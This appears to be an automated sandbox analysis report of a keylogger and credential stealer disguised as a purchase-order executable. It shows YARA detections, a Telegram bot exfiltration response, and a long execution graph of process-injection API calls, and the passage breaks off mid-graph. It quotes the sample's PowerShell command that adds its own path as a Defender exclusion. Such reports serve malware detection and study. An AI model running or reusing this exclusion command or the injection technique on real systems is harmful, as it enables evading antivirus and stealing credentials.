                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17257,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734355096,"document"


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:08:14:05
                                                                                                                                            Start date:16/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
                                                                                                                                            Imagebase:0x670000
                                                                                                                                            File size:792'064 bytes
                                                                                                                                            MD5 hash:4B393B41E5B7BDD02E481816BEC9FF4A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:08:14:08
                                                                                                                                            Start date:16/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
                                                                                                                                            Imagebase:0xab0000
                                                                                                                                            File size:433'152 bytes
                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:08:14:08
                                                                                                                                            Start date:16/12/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:08:14:10
                                                                                                                                            Start date:16/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
                                                                                                                                            Imagebase:0x500000
                                                                                                                                            File size:792'064 bytes
                                                                                                                                            MD5 hash:4B393B41E5B7BDD02E481816BEC9FF4A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:13.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:4.2%
                                                                                                                                              Total number of Nodes:1091
                                                                                                                                              Total number of Limit Nodes:86
                                                                                                                                              execution_graph 77519 7022640 77520 702267a 77519->77520 77521 70226f6 77520->77521 77522 702270b 77520->77522 77527 70203c8 77521->77527 77524 70203c8 3 API calls 77522->77524 77526 702271a 77524->77526 77529 70203d3 77527->77529 77528 7022701 77529->77528 77532 70230f0 77529->77532 77539 7023100 77529->77539 77533 7023100 77532->77533 77545 702041c 77533->77545 77536 7023127 77536->77528 77537 7023150 CreateIconFromResourceEx 77538 70231ce 77537->77538 77538->77528 77540 702041c CreateIconFromResourceEx 77539->77540 77541 702311a 77540->77541 77542 7023127 77541->77542 77543 7023150 CreateIconFromResourceEx 77541->77543 77542->77528 77544 70231ce 77543->77544 77544->77528 77546 7023150 CreateIconFromResourceEx 77545->77546 77547 702311a 77546->77547 77547->77536 77547->77537 76438 c46c9c0 76439 c46c9df 76438->76439 76443 c46cb92 76439->76443 76447 c46cba0 76439->76447 76440 c46ca0f 76444 c46cbb6 76443->76444 76451 c46cefa 76444->76451 76448 c46cbb6 76447->76448 76450 c46cefa DrawTextExW 76448->76450 76449 c46cc2c 76449->76440 76450->76449 76455 c46cf40 76451->76455 76460 c46cf3a 76451->76460 76452 c46cc2c 76452->76440 76456 c46cf71 76455->76456 76457 c46cf9d 76456->76457 76465 7026da0 76456->76465 76470 7026d90 76456->76470 76457->76452 76461 c46cf71 76460->76461 76462 c46cf9d 76461->76462 76463 7026d90 DrawTextExW 76461->76463 76464 7026da0 DrawTextExW 76461->76464 76462->76452 76463->76462 76464->76462 76467 7026dc1 76465->76467 76466 7026dd6 76466->76457 76467->76466 76475 7024b5c 76467->76475 76469 7026e41 76472 7026da0 76470->76472 76471 7026dd6 76471->76457 76472->76471 76473 7024b5c DrawTextExW 76472->76473 76474 7026e41 76473->76474 76477 7024b67 76475->76477 76476 7028349 76476->76469 76477->76476 76481 7028e18 76477->76481 76484 7028e08 76477->76484 76478 702845c 76478->76469 76488 702790c 76481->76488 76485 7028e18 76484->76485 76486 702790c DrawTextExW 76485->76486 76487 7028e35 76486->76487 76487->76478 76489 7028e50 DrawTextExW 76488->76489 76491 7028e35 76489->76491 76491->76478 77548 c466c80 DispatchMessageW 77549 c466cec 77548->77549 77550 c465100 77551 c465112 77550->77551 77552 c46522d 77551->77552 77554 751cce8 2 API calls 77551->77554 77555 751ef31 77551->77555 77554->77552 77556 751ef40 77555->77556 77557 751ef91 GetFocus 77556->77557 77558 751effe 77556->77558 77559 751efb9 77557->77559 77558->77552 77559->77558 77560 751effc KiUserCallbackDispatcher 77559->77560 77560->77558 77561 2b61cf0 77562 2b61d58 CreateWindowExW 77561->77562 77564 2b61e14 77562->77564 77565 751b916 77568 751b150 77565->77568 77569 751b15b 77568->77569 77572 751c12a 77569->77572 77570 751b923 77573 751c132 GetCurrentThreadId 77572->77573 77575 751c1cd 77573->77575 77575->77570 76492 75109da 76493 75109df 76492->76493 76500 7512bc8 76493->76500 76503 7512bc7 76493->76503 76494 7510ac8 76506 75141df 76494->76506 76510 75141f0 76494->76510 76495 7510c9b 76501 7512bd0 76500->76501 76514 2b645a0 76500->76514 76501->76494 76505 2b645a0 8 API calls 76503->76505 76504 7512bd0 76504->76494 76505->76504 76507 7514236 76506->76507 76508 7514244 GetForegroundWindow 76507->76508 76509 751426c 76508->76509 76509->76495 76511 7514236 76510->76511 76512 7514244 GetForegroundWindow 76511->76512 76513 751426c 76512->76513 76513->76495 76515 2b645b0 76514->76515 76516 2b645ed 76515->76516 76521 751c810 76515->76521 76541 f9f780 76515->76541 76546 751c800 76515->76546 76566 f9f768 76515->76566 76516->76501 76522 751c849 76521->76522 76524 751c8e7 76522->76524 76535 f9f768 8 API calls 76522->76535 76536 f9f780 8 API calls 76522->76536 76523 751c95d 76590 7020358 76523->76590 76594 70223ef 76523->76594 76524->76523 76574 70224a8 76524->76574 76582 7020348 76524->76582 76525 751ca9f 76526 751cad0 76525->76526 76606 f9f032 76525->76606 76611 f9dcf4 76525->76611 76615 70223c8 76526->76615 76619 70223d8 76526->76619 76527 751c965 76527->76525 76598 75150b0 76527->76598 76602 75150a0 76527->76602 76528 751cae4 76535->76524 76536->76524 76542 f9f7b1 76541->76542 76543 f9f7bd 76541->76543 76542->76543 76691 7512bf8 76542->76691 76695 7512c08 76542->76695 76543->76516 76547 751c806 76546->76547 76549 751c8e7 76547->76549 76559 f9f768 8 API calls 76547->76559 76560 f9f780 8 API calls 76547->76560 76548 751c95d 76564 7020358 KiUserCallbackDispatcher 76548->76564 76565 70223ef KiUserCallbackDispatcher 76548->76565 76549->76548 76555 7020348 2 API calls 76549->76555 76556 70224a8 2 API calls 76549->76556 76550 751ca9f 76561 751cad0 76550->76561 76562 f9f032 8 API calls 76550->76562 76563 f9dcf4 8 API calls 76550->76563 76551 751c965 76551->76550 76557 75150b0 KiUserCallbackDispatcher 76551->76557 76558 75150a0 KiUserCallbackDispatcher 76551->76558 76552 751cae4 76553 70223c8 KiUserCallbackDispatcher 76553->76552 76554 70223d8 KiUserCallbackDispatcher 76554->76552 76555->76548 76556->76548 76557->76550 76558->76550 76559->76549 76560->76549 76561->76553 76561->76554 76562->76561 76563->76561 76564->76551 76565->76551 76567 f9f745 76566->76567 76569 f9f772 76566->76569 76572 c460472 2 API calls 76567->76572 76573 c460480 2 API calls 76567->76573 76568 f9f7bd 76568->76516 76569->76568 76570 7512c08 8 API calls 76569->76570 76571 7512bf8 8 API calls 76569->76571 76570->76568 76571->76568 76572->76566 76573->76566 76575 70224b6 76574->76575 76577 7022546 76575->76577 76623 751dae0 76575->76623 76628 751dad1 76575->76628 76576 70225e7 76580 751dad1 2 API calls 76576->76580 76581 751dae0 2 API calls 76576->76581 76577->76523 76580->76577 76581->76577 76583 7020353 76582->76583 76585 7022546 76583->76585 76588 751dad1 2 API calls 76583->76588 76589 751dae0 2 API calls 76583->76589 76584 70225e7 76586 751dad1 2 API calls 76584->76586 76587 751dae0 2 API calls 76584->76587 76585->76523 76586->76585 76587->76585 76588->76584 76589->76584 76592 7020363 76590->76592 76591 7022430 76591->76527 76592->76591 76593 702241c KiUserCallbackDispatcher 76592->76593 76593->76591 76595 7022411 76594->76595 76596 7022430 76595->76596 76597 702241c KiUserCallbackDispatcher 76595->76597 76596->76527 76597->76596 76600 75150c3 76598->76600 76599 75150c7 76599->76525 76600->76599 76601 751511a KiUserCallbackDispatcher 76600->76601 76601->76599 76603 75150b0 76602->76603 76604 75150c7 76603->76604 76605 751511a KiUserCallbackDispatcher 76603->76605 76604->76525 76605->76604 76607 f9efe9 76606->76607 76608 f9f03e 76606->76608 76607->76526 76610 f9f0d5 76608->76610 76637 f9cac4 76608->76637 76610->76526 76612 f9dcff 76611->76612 76613 f9cac4 8 API calls 76612->76613 76614 f9f0d5 76612->76614 76613->76614 76614->76526 76616 70223e5 76615->76616 76617 7020358 KiUserCallbackDispatcher 76616->76617 76618 70223ec 76617->76618 76618->76528 76620 70223e5 76619->76620 76621 7020358 KiUserCallbackDispatcher 76620->76621 76622 70223ec 76621->76622 76622->76528 76624 751daf0 76623->76624 76633 751db18 PostMessageW 76624->76633 76635 751db10 PostMessageW 76624->76635 76625 751db01 76625->76576 76629 751dae0 76628->76629 76631 751db10 PostMessageW 76629->76631 76632 751db18 PostMessageW 76629->76632 76630 751db01 76630->76576 76631->76630 76632->76630 76634 751db84 76633->76634 76634->76625 76636 751db84 76635->76636 76636->76625 76638 f9cacf 76637->76638 76641 f9dde8 76638->76641 76640 f9f5af 76640->76610 76643 f9ddf3 76641->76643 76642 f9f758 76642->76640 76643->76642 76645 f9f682 76643->76645 76647 f9f768 8 API calls 76643->76647 76648 f9f780 8 API calls 76643->76648 76644 f9f721 76651 c460472 76644->76651 76658 c460480 76644->76658 76645->76644 76646 f9dde8 8 API calls 76645->76646 76646->76645 76647->76645 76648->76645 76652 c4604dd 76651->76652 76654 c46047a 76651->76654 76652->76642 76653 c4604cf 76653->76642 76654->76653 76664 c460638 76654->76664 76668 c460627 76654->76668 76672 c460861 76654->76672 76660 c460492 76658->76660 76659 c4604cf 76659->76642 76660->76659 76661 c460627 2 API calls 76660->76661 76662 c460861 2 API calls 76660->76662 76663 c460638 2 API calls 76660->76663 76661->76659 76662->76659 76663->76659 76666 c46065b 76664->76666 76665 c46085a 76665->76653 76666->76665 76676 c460c10 76666->76676 76670 c46065b 76668->76670 76669 c46085a 76669->76653 76670->76669 76671 c460c10 2 API calls 76670->76671 76671->76669 76673 c46081c 76672->76673 76674 c46085a 76673->76674 76675 c460c10 2 API calls 76673->76675 76674->76653 76675->76674 76677 c460c47 76676->76677 76681 c460fe3 76677->76681 76686 c460fbf 76677->76686 76678 c460c6b 76682 c460ff6 76681->76682 76684 c461220 PostMessageW 76682->76684 76685 c4611f1 PostMessageW 76682->76685 76683 c461019 76683->76678 76684->76683 76685->76683 76687 c460fe4 76686->76687 76688 c460fc5 76686->76688 76689 c461220 PostMessageW 76687->76689 76690 c4611f1 PostMessageW 76687->76690 76688->76678 76689->76688 76690->76688 76693 7512c08 76691->76693 76692 7512c2d 76692->76543 76693->76692 76694 2b645a0 8 API calls 76693->76694 76694->76692 76696 7512c16 76695->76696 76697 7512c2d 76696->76697 76698 2b645a0 8 API calls 76696->76698 76697->76543 76698->76697 76699 2b61f38 SetWindowLongW 76700 2b61fa4 76699->76700 77576 c466408 PeekMessageW 77577 c46647f 77576->77577 76701 75131c0 76702 7513205 GetClassInfoW 76701->76702 76704 751324b 76702->76704 76705 f94668 76706 f94672 76705->76706 76710 f94758 76705->76710 76715 f93e1c 76706->76715 76708 f9468d 76711 f9475d 76710->76711 76719 f94868 76711->76719 76723 f94858 76711->76723 76716 f93e27 76715->76716 76731 f95bfc 76716->76731 76718 f96f90 76718->76708 76721 f9488f 76719->76721 76720 f9496c 76721->76720 76727 f9449c 76721->76727 76724 f9488f 76723->76724 76725 f9496c 76724->76725 76726 f9449c CreateActCtxA 76724->76726 76726->76725 76728 f958f8 CreateActCtxA 76727->76728 76730 f959bb 76728->76730 76732 f95c07 76731->76732 76735 f95c1c 76732->76735 76734 f9712d 76734->76718 76736 f95c27 76735->76736 76739 f95c4c 76736->76739 76738 f97202 76738->76734 76740 f95c57 76739->76740 76743 f95c7c 76740->76743 76742 f97305 76742->76738 76744 f95c87 76743->76744 76745 f98498 76744->76745 76753 f98742 76744->76753 76747 f986f3 76745->76747 76762 f9aa99 76745->76762 76766 f9aaa8 76745->76766 76770 f9ada0 76745->76770 76746 f98731 76746->76742 76747->76746 76774 f9ce81 76747->76774 76754 f986c8 76753->76754 76757 f98746 76753->76757 76755 f986f3 76754->76755 76759 f9aa99 2 API calls 76754->76759 76760 f9aaa8 2 API calls 76754->76760 76761 f9ada0 2 API calls 76754->76761 76756 f98731 76755->76756 76758 f9ce81 15 API calls 76755->76758 76756->76745 76757->76745 76758->76756 76759->76755 76760->76755 76761->76755 76764 f9aac3 76762->76764 76765 f9acf8 76764->76765 76779 f9a6d4 76764->76779 76765->76747 76768 f9aac3 76766->76768 76767 f9a6d4 2 API calls 76769 f9acf8 76767->76769 76768->76767 76768->76769 76769->76747 76792 f9add8 76770->76792 76795 f9adc9 76770->76795 76771 f9adb6 76771->76747 76775 f9ceb1 76774->76775 76776 f9ced5 76775->76776 76811 f9d040 76775->76811 76815 f9d030 76775->76815 76776->76746 76780 f9a6df 76779->76780 76781 f9fddd 76780->76781 76784 7514828 76780->76784 76788 7514818 76780->76788 76781->76765 76785 751486b 76784->76785 76786 75148ba 76785->76786 76787 7514889 MonitorFromPoint 76785->76787 76786->76781 76787->76786 76789 7514828 76788->76789 76790 75148ba 76789->76790 76791 7514889 MonitorFromPoint 76789->76791 76790->76781 76791->76790 76799 f9aed0 76792->76799 76793 f9ade7 76793->76771 76796 f9add8 76795->76796 76798 f9aed0 2 API calls 76796->76798 76797 f9ade7 76797->76771 76798->76797 76800 f9aee1 76799->76800 76801 f9af04 76799->76801 76800->76801 76802 f9aefc 76800->76802 76806 f9b159 76800->76806 76801->76793 76802->76801 76803 f9b108 GetModuleHandleW 76802->76803 76804 f9b135 76803->76804 76804->76793 76807 f9b102 GetModuleHandleW 76806->76807 76810 f9b162 76806->76810 76809 f9b135 76807->76809 76809->76802 76810->76802 76812 f9d04d 76811->76812 76813 f9d087 76812->76813 76819 f9c978 76812->76819 76813->76776 76817 f9d04d 76815->76817 76816 f9d087 76816->76776 76817->76816 76818 f9c978 15 API calls 76817->76818 76818->76816 76820 f9c983 76819->76820 76822 f9d9cf 76820->76822 76823 f9caa4 76820->76823 76822->76813 76824 f9caaf 76823->76824 76825 f95c7c 15 API calls 76824->76825 76826 f9da07 76825->76826 76827 f9da16 76826->76827 76837 f9de88 76826->76837 76845 f9de7a 76826->76845 76853 f9cab4 76827->76853 76829 f9da30 76830 f9cac4 8 API calls 76829->76830 76831 f9da37 76830->76831 76833 f9f768 8 API calls 76831->76833 76834 f9f780 8 API calls 76831->76834 76832 f9da41 76832->76820 76833->76832 76834->76832 76838 f9deb6 76837->76838 76839 f9dae0 GetFocus 76838->76839 76840 f9dedf 76838->76840 76844 f9dff3 76838->76844 76839->76840 76841 f9df87 76840->76841 76843 f9df82 KiUserCallbackDispatcher 76840->76843 76840->76844 76842 f9cac4 8 API calls 76841->76842 76841->76844 76842->76844 76843->76841 76846 f9deb6 76845->76846 76847 f9dae0 GetFocus 76846->76847 76850 f9dedf 76846->76850 76852 f9dff3 76846->76852 76847->76850 76848 f9df87 76849 f9cac4 8 API calls 76848->76849 76848->76852 76849->76852 76850->76848 76851 f9df82 KiUserCallbackDispatcher 76850->76851 76850->76852 76851->76848 76855 f9cabf 76853->76855 76854 f9dcf4 8 API calls 76856 f9efa4 76854->76856 76855->76854 76857 f9efa9 76855->76857 76856->76829 76857->76829 76858 7510040 76859 7510078 76858->76859 76863 75116c0 76859->76863 76868 75116b0 76859->76868 76860 7510173 76865 f95c7c 15 API calls 76863->76865 76867 f98742 15 API calls 76863->76867 76875 f98430 76863->76875 76864 75116d3 76864->76860 76865->76864 76867->76864 76869 751169f 76868->76869 76870 75116be 76868->76870 76869->76860 76871 75116d3 76870->76871 76872 f95c7c 15 API calls 76870->76872 76873 f98430 15 API calls 76870->76873 76874 f98742 15 API calls 76870->76874 76871->76860 76872->76871 76873->76871 76874->76871 76876 f983ba 76875->76876 76876->76875 76877 f98498 76876->76877 76880 f98742 15 API calls 76876->76880 76879 f986f3 76877->76879 76881 f9aa99 2 API calls 76877->76881 76882 f9aaa8 2 API calls 76877->76882 76883 f9ada0 2 API calls 76877->76883 76878 f98731 76878->76864 76879->76878 76884 f9ce81 15 API calls 76879->76884 76880->76877 76881->76879 76882->76879 76883->76879 76884->76878 76885 751b040 76886 751b068 76885->76886 76889 751945c 76886->76889 76890 7519467 76889->76890 76891 751b62c 76890->76891 76892 751b729 76890->76892 76894 2b645a0 8 API calls 76890->76894 76891->76892 76895 c465ef9 76891->76895 76894->76891 76897 c465f29 76895->76897 76896 c466308 WaitMessage 76896->76897 76897->76896 76898 c465fb4 76897->76898 76899 7510d46 76900 7510d59 76899->76900 76907 2b675fc 76900->76907 76913 2b684c8 76900->76913 76901 751103e 76920 7020d21 76901->76920 76931 7020d30 76901->76931 76902 751107e 76908 2b67607 76907->76908 76909 2b68545 76908->76909 76942 7516f3f 76908->76942 76946 7516f50 76908->76946 76909->76901 76914 2b684cb 76913->76914 76916 2b68480 76913->76916 76915 2b68545 76914->76915 76918 7516f50 9 API calls 76914->76918 76919 7516f3f 9 API calls 76914->76919 76915->76901 76916->76901 76917 2b6850f 76917->76901 76918->76917 76919->76917 76922 7020d45 76920->76922 76921 7020dcb 76929 7020d30 GetCurrentThreadId 76921->76929 76930 7020d21 GetCurrentThreadId 76921->76930 76922->76921 76924 7020e00 76922->76924 76923 7020dd5 76923->76902 76928 7020f04 76924->76928 76955 70200d4 76924->76955 76927 70200d4 GetCurrentThreadId 76927->76928 76928->76902 76929->76923 76930->76923 76933 7020d45 76931->76933 76932 7020dcb 76940 7020d30 GetCurrentThreadId 76932->76940 76941 7020d21 GetCurrentThreadId 76932->76941 76933->76932 76935 7020e00 76933->76935 76934 7020dd5 76934->76902 76936 70200d4 GetCurrentThreadId 76935->76936 76939 7020f04 76935->76939 76937 7020f28 76936->76937 76938 70200d4 GetCurrentThreadId 76937->76938 76938->76939 76939->76902 76940->76934 76941->76934 76944 7516f70 76942->76944 76950 2b6bdc0 76944->76950 76947 7516f70 76946->76947 76949 2b6bdc0 9 API calls 76947->76949 76948 2b6850f 76948->76901 76949->76948 76952 2b6bdc8 76950->76952 76951 2b6be9e 76952->76951 76953 2b645a0 8 API calls 76952->76953 76954 2b6bf29 KiUserCallbackDispatcher 76953->76954 76954->76951 76956 70200df 76955->76956 76957 702124f GetCurrentThreadId 76956->76957 76958 7020f28 76956->76958 76957->76958 76958->76927 77578 751a708 77581 751a773 77578->77581 77584 751ab08 77578->77584 77579 751a832 GetCapture 77582 751a874 77579->77582 77580 751a8b5 GetActiveWindow 77583 751a8ec 77580->77583 77581->77579 77581->77584 77582->77580 77583->77584 77587 751fc98 77583->77587 77595 751fc88 77583->77595 77589 751fcbe 77587->77589 77588 751fcd2 77588->77584 77589->77588 77592 751fdbd 77589->77592 77593 f9de88 10 API calls 77589->77593 77594 f9de7a 10 API calls 77589->77594 77590 751ff91 77590->77584 77591 751cce8 2 API calls 77591->77590 77592->77590 77592->77591 77593->77592 77594->77592 77597 751fcbe 77595->77597 77596 751fcd2 77596->77584 77597->77596 77599 751fdbd 77597->77599 77601 f9de88 10 API calls 77597->77601 77602 f9de7a 10 API calls 77597->77602 77598 751ff91 77598->77584 77599->77598 77600 751cce8 2 API calls 77599->77600 77600->77598 77601->77599 77602->77599 77603 f9d3a0 DuplicateHandle 77604 f9d436 77603->77604 76959 2b64428 76960 2b64438 76959->76960 76967 751d680 76960->76967 76971 2b65a68 76960->76971 76983 2b65d14 76960->76983 76989 2b65a52 76960->76989 77001 751d690 76960->77001 76961 2b64461 76968 751d6c5 76967->76968 76970 2b65d14 8 API calls 76968->76970 76969 751d71a 76969->76961 76970->76969 76975 2b65a94 76971->76975 76973 2b65ccc 76974 2b645a0 8 API calls 76973->76974 76976 2b65e74 76973->76976 76974->76976 76975->76973 77005 2b656e0 76975->77005 76976->76961 76977 2b65b4d 76978 2b645a0 8 API calls 76977->76978 76982 2b65bf5 76977->76982 76979 2b65bbf 76978->76979 76980 2b645a0 8 API calls 76979->76980 76980->76982 76981 2b645a0 8 API calls 76981->76973 76982->76981 76984 2b65d1d 76983->76984 76986 2b65d3b 76983->76986 76985 2b645a0 8 API calls 76984->76985 76984->76986 76985->76986 76987 2b645a0 8 API calls 76986->76987 76988 2b65e74 76986->76988 76987->76988 76988->76961 76993 2b65a68 76989->76993 76990 2b656e0 8 API calls 76995 2b65b4d 76990->76995 76991 2b65ccc 76992 2b645a0 8 API calls 76991->76992 76994 2b65e74 76991->76994 76992->76994 76993->76990 76993->76991 76994->76961 76996 2b645a0 8 API calls 76995->76996 76998 2b65bf5 76995->76998 76997 2b65bbf 76996->76997 76999 2b645a0 8 API calls 76997->76999 77000 2b645a0 8 API calls 76998->77000 76999->76998 77000->76991 77002 751d6c5 77001->77002 77004 2b65d14 8 API calls 77002->77004 77003 751d71a 77003->76961 77004->77003 77007 2b656eb 77005->77007 77006 2b645a0 8 API calls 77010 2b65fc9 77006->77010 77008 2b645a0 8 API calls 77007->77008 77009 2b66007 77007->77009 77007->77010 77008->77010 77009->76977 77010->77006 77010->77009 77011 f9d158 77012 f9d19e GetCurrentProcess 77011->77012 77014 f9d1e9 77012->77014 77015 f9d1f0 GetCurrentThread 77012->77015 77014->77015 77016 f9d22d GetCurrentProcess 77015->77016 77017 f9d226 77015->77017 77018 f9d263 77016->77018 77017->77016 77019 f9d28b GetCurrentThreadId 77018->77019 77020 f9d2bc 77019->77020 77021 f9fc58 77023 f9aa99 2 API calls 77021->77023 77024 f9aaa8 2 API calls 77021->77024 77022 f9fc91 77023->77022 77024->77022 77605 70204e0 77607 7020507 77605->77607 77606 7020759 77608 7020725 77607->77608 77609 2b6bdc0 9 API calls 77607->77609 77609->77606 77610 7513d38 77611 7513cdd 77610->77611 77613 7513d46 77610->77613 77612 7513d0c 77611->77612 77614 c4612b7 8 API calls 77611->77614 77615 c4612c8 8 API calls 77611->77615 77614->77612 77615->77612 77616 f0d01c 77617 f0d034 77616->77617 77618 f0d08e 77617->77618 77619 2b60ad4 11 API calls 77617->77619 77623 2b61e98 77617->77623 77627 2b62c08 77617->77627 77636 2b61ea8 77617->77636 77619->77618 77624 2b61ece 77623->77624 77625 2b60ad4 11 API calls 77624->77625 77626 2b61eef 77625->77626 77626->77618 77630 2b62c45 77627->77630 77628 2b62c79 77629 2b60bfc 11 API calls 77628->77629 77632 2b62c77 77629->77632 77630->77628 77631 2b62c69 77630->77631 77633 2b62da0 11 API calls 77631->77633 77634 2b62d91 11 API calls 77631->77634 77635 2b62e6c 11 API calls 77631->77635 77632->77632 77633->77632 77634->77632 77635->77632 77637 2b61ece 77636->77637 77638 2b60ad4 11 API calls 77637->77638 77639 2b61eef 77638->77639 77639->77618 77025 b888e26 77026 b888db4 77025->77026 77027 b888e29 77025->77027 77044 b888e06 77026->77044 77046 b88920c 77026->77046 77049 b889317 77026->77049 77054 b889472 77026->77054 77059 b889433 77026->77059 77065 b8894dd 77026->77065 77068 b8895d2 77026->77068 77073 b8898bb 77026->77073 77078 b8899fb 77026->77078 77082 b8893f8 77026->77082 77087 b8892f9 77026->77087 77092 b889ba6 77026->77092 77099 b889a66 77026->77099 77104 b889261 77026->77104 77109 b889285 77026->77109 77113 b8892ae 77026->77113 77117 b889b80 77026->77117 77122 b88934a 77026->77122 77126 710d098 77046->77126 77050 b8892c5 77049->77050 77051 b889344 77050->77051 77130 710c390 77050->77130 77051->77044 77055 b88926d 77054->77055 77055->77044 77056 b889c26 77055->77056 77134 710c878 77055->77134 77138 710cf00 77055->77138 77060 b8897dc 77059->77060 77142 710c950 77060->77142 77067 710c878 Wow64SetThreadContext 77065->77067 77066 b8894f7 77066->77044 77067->77066 77070 b88926d 77068->77070 77069 b889c26 77070->77044 77070->77069 77071 710cf00 ReadProcessMemory 77070->77071 77072 710c878 Wow64SetThreadContext 77070->77072 77071->77070 77072->77070 77074 b88926d 77073->77074 77074->77044 77075 b889c26 77074->77075 77076 710c878 Wow64SetThreadContext 77074->77076 77077 710cf00 ReadProcessMemory 77074->77077 77075->77075 77076->77074 77077->77074 77079 b889a01 77078->77079 77081 710ca10 WriteProcessMemory 77079->77081 77080 b889a33 77081->77080 77083 b88926d 77082->77083 77083->77044 77084 b889c26 77083->77084 77085 710c878 Wow64SetThreadContext 77083->77085 77086 710cf00 ReadProcessMemory 77083->77086 77085->77083 77086->77083 77089 b88926d 77087->77089 77088 b889c26 77089->77044 77089->77088 77090 710cf00 ReadProcessMemory 77089->77090 77091 710c878 Wow64SetThreadContext 77089->77091 77090->77089 77091->77089 77093 b889bac 77092->77093 77097 710cf00 ReadProcessMemory 77093->77097 77094 b889c26 77095 b88926d 77095->77044 77095->77094 77096 710cf00 ReadProcessMemory 77095->77096 77098 710c878 Wow64SetThreadContext 77095->77098 77096->77095 77097->77095 77098->77095 77102 710c878 Wow64SetThreadContext 77099->77102 77100 b889c26 77101 b88926d 77101->77044 77101->77099 77101->77100 77103 710cf00 ReadProcessMemory 77101->77103 77102->77101 77103->77101 77105 b88926d 77104->77105 77105->77044 77106 b889c26 77105->77106 77107 710c878 Wow64SetThreadContext 77105->77107 77108 710cf00 ReadProcessMemory 77105->77108 77106->77106 77107->77105 77108->77105 77110 b8892a8 77109->77110 77112 710ca10 WriteProcessMemory 77110->77112 77111 b889793 77111->77044 77112->77111 77114 b8892b4 77113->77114 77116 710c390 ResumeThread 77114->77116 77115 b8892da 77116->77115 77119 b88926d 77117->77119 77118 b889c26 77119->77044 77119->77117 77119->77118 77120 710c878 Wow64SetThreadContext 77119->77120 77121 710cf00 ReadProcessMemory 77119->77121 77120->77119 77121->77119 77123 b889353 77122->77123 77125 710ca10 WriteProcessMemory 77123->77125 77124 b88968b 77125->77124 77127 710d121 CreateProcessA 77126->77127 77129 710d2e3 77127->77129 77131 